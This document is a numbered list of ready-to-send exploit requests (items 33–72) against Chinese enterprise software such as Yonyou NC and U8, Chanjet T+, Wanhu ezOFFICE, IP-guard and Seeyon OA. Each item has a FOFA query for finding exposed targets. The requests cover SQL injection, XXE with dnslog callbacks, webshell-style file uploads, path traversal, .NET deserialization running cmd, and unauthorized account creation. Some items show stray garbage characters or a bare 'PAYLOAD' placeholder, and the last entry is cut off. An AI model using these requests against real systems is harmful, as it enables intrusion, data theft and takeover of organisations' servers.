33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

; X# Z+ n4 I" w6 `0 C) I34. 用友NC warningDetailInfo接口SQL注入
, U. ~+ e4 s1 _ j p+ FFOFA:app="用友-UFIDA-NC"
; s6 P+ g2 b- k) ^GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1* z1 m8 z8 m2 s& f8 }8 i
Host: your-ip
; y' E5 C5 ?+ r1 h' O W" CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 L; G) [3 P' D/ V7 bContent-Type: application/x-www-form-urlencoded2 O! A- |. i' H5 z2 j( [
Accept-Encoding: gzip, deflate
) ?; g, k# g& r' E' R+ cAccept: */*# d) e/ h; T% D. V
Connection: keep-alive
6 _2 C2 H- R# \
! F/ d: v9 M1 }# G- d& }; a7 g& I- w0 ~8 \
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string>< ]
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
</ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
12311
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Socialized Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 (Entsoft) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0k

id98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 (Jiecheng) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
 <GetOSpById xmlns="http://tempuri.org/">
 <sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 (one-face-pass) smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 on lines 42 and 43 confirms the vulnerability.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 167029

__VIEWSTATE=PAYLOAD

71. 邦永 (Bangyong) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

